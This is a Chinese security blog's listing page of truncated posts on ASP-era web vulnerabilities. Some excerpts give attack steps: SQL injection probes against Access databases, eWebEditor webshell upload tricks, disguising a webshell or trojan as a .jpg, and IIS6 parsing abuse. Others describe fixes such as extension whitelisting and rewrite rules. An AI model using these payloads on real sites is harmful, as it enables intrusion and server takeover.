浏览模式: 普通 | 列表
分类: 常见漏洞和解决方法 | < | 1 | 2 | 3 | >

access手工注入笔记

[ 2013-05-28 17:02:46 | 作者: admin ]
http://www.xxx.com/news.asp?id=6
注入点
判断是否存在注入 两次返回不一样 存在注入
http://www.xxx.com/news.asp?id=6and 1=1
http://www.xxx.com/news.asp?id=6and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0 (返回权限不足access数据库)
and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)

猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表

现在我们来猜解字段
...

阅读全文…

ewebeditor不进后台拿shell的方法

[ 2013-05-28 16:59:49 | 作者: admin ]
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 ...

阅读全文…
p.s. 一些网友通过伪造图片绕过各论坛的上传系统,从而将代码隐藏在图片文件中以获得执行。将HTML代码伪装成GIF图片后,浏览器在对其进行解析的时候会将其中隐藏的HTML或客户端脚本代码解释执行,但所幸的是服务器端脚本不会被执行。目前的大多数论坛、或博客等CMS系统均无法有效识别和阻止这种伪造的GIF文件上传。另外火狐内核的浏览器则不会执行。


特点:
1 针对任何没有打过补丁的IE6版本都有效!
2 木马下载过程中防火墙不会做任何反应!
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg  和一般的图片地址无任何俩样!打开地址后在浏览器上会和正常情况下一样出现图片!但木马却已经在后台下载并在下载完成后自动执行!具有很强的迷惑性!

首先我要给大家说的是以下所讲的东西极其简单,只需要你稍微懂得一点HTML语言,你就能够做出各式各样的网...

阅读全文…

chr(0)文件上传漏洞原理

[ 2009-09-26 17:30:36 | 作者: admin ]
p.s. 该上传漏洞相当普遍,解决也很简单,程序提取上传的文件后缀,加以白名单判断(勿使用黑名单),然后系统自动生成 随机文件名+后缀 即可解决。

我们在用 ASP 开发文件上传功能的时候,为了防止用户上传木马程序,常常会限制一些文件的上传,常用的方法是判断一下上传文件的扩展名是否符合规定,可以用 right 字符串函数取出上传文件的文件名的后四位,这样很容易就能判断了,但是这里面有一个漏洞,非常危险,就是 chr(0) 漏洞,详情请接着往下看。

一、首先解释下什么是 chr(0)?

在 ASP 中可以用 chr() 函数调用 ASCII 码,其中 chr(0) 表示调用的是一个结束字符,简单的说当一个字符串中包含 chr(0) 字符时,只能输出 chr(0) 前面的字符,chr(0) 后面的字符将不被输出。举例如说明:

<%response.write ...

阅读全文…
p.s. 木马文件 mu.asp 改成 mu.jpg
在网站建立一个 tao123.asp 目录,将mu.jpg放里面,mu.jpg可以运行

IIS6.0 文件名解析漏洞 终极解决办法!
(银月原创,转载请链接 http://silmoon.com/blog/blogview.asp?logID=143,谢谢)
我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。

http://test.com/dir.asp/diy.jpg
比如这就是个diy.asp被更改成图片的文件
IIS6.0的漏洞可以运行它。

我的解决办法:
我在
http://test.com/
下弄了个图片,上面写的警告信息
http://test.com/no.jpg

我在IIS6.0中安装了Rewrite这个ISAPI
下载ISAPIrewrite破解版 点击下载此文件
...

阅读全文…
http://hi.baidu.com/xinwg126/blog/item/998b0f186d9b680134fa4103.html

今天用了以下eWebEditor,根据网上一篇文章改了一下.因为怕被黑啊,网上都有eWebEditor漏洞的攻击方法,所以得改改,怕怕!

第一步:下载eWebEditor2.8 修正版

下载地址http://ewebeditor.webasp.net/download.asp
解压放到项目文件目录下. 为了方便使用我把文件改名为ewebeditor

第二步:修改相关调用到编辑器的ASP文件

<iframe ID="Editor" src="ewebeditor/ewebeditor.asp?Id=NewsContent&style=s_newssystem" frameborder="0" scrolling="no" width="100%" HEIGHT="100%"></iframe>
...

阅读全文…

ewebeditor上传任意文件漏洞利用工具

[ 2009-09-26 10:14:00 | 作者: admin ]
注意有些版本没有此漏洞,具体什么版本号,我没有测试,大家在利用前先确定版本号,以确认有漏洞,要不然下面的文章会测试不成功!

http://www.qhwins.com/ShowNews/?11-20095317001981643.html

        作者的思路很妙,利用UNION语句,将执行结果调出来,然后加入自定义的文件后辍名,真是好办法,这种方法除了在这里可以用到,我想在以后的入侵过种中还会发挥很大的作用,作者说用NC抓包提交就可以做到上传木马,但是那个东东修改数据包,修改发送字节数之类的很麻烦,稍不留心就会失败,服务器返回提交参数错误之类的信息,看了很不爽,我用NC试了两次都没成功,一不做,二不休,我干脆做成一个HTML的,方便使用,直接给出代码如下:

        <HTML>
<HEAD>
<TITLE>文件上传</TITLE>
<meta http-equiv="Content-Type" ...

阅读全文…

ewebeditor漏洞解決方法

[ 2009-09-26 09:56:35 | 作者: admin ]
1,修改admin的密碼.

2,upload.asp中的
' 任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
改為:
' 任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
sAllowExt = Replace(UCase(sAllowExt), "ASA", "")
sAllowExt = Replace(UCase(sAllowExt), "CER", "")
sAllowExt = Replace(UCase(sAllowExt), "AASPSP", "")
sAllowExt = Replace(UCase(sAllowExt), "CDX", "")
sAllowExt = Replace(UCase(sAllowExt), "HTR", "")
...

阅读全文…